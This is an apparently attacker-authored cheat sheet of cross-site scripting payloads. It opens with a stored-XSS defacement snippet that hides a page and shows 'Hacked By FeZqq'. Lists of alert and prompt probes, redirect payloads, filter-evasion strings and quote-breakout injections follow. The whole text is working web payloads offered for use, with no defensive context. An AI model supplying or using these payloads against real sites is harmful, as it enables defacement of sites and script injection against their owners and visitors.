Destroy Everything For Stored XSS (Use Carefully)
-------------------------------------------------
<style>html::before {content: "Hacked By FeZqq";} body {display: none;}</style>



Basic Payloads For First Step
-------------------------------------------------
<script>alert(1)</script>
<img src=validimage.png onload=alert(1)>
<img src/onerror=prompt(8)>
<input onclick="alert(1)" style=display:block>test</input>
<a onmouseover="alert(1)" style=display:block>test</a>
<a href="javascript:alert(1)">Click</a>




Redirect Payloads
-------------------------------------------------
<script>window.location='https://google.com'</script>
<script>window.location=&quot;https://google.com&quot;</script>
<script>location='https://google.com'</script>
<a href="#" onclick="location='https://google.com'">Click me</a>
<img src=x onerror="location='https://google.com'">

Other
------------
"><svg/onload​=setTimeout`${'ale'+'rt'}(1)`>
javascript:alert(1)
\"-alert(1)}//
\';alert(1)//
<img src/onerror=prompt("test")>

onclick event
-------------
http://foo?&apos;-alert(1)-&apos;



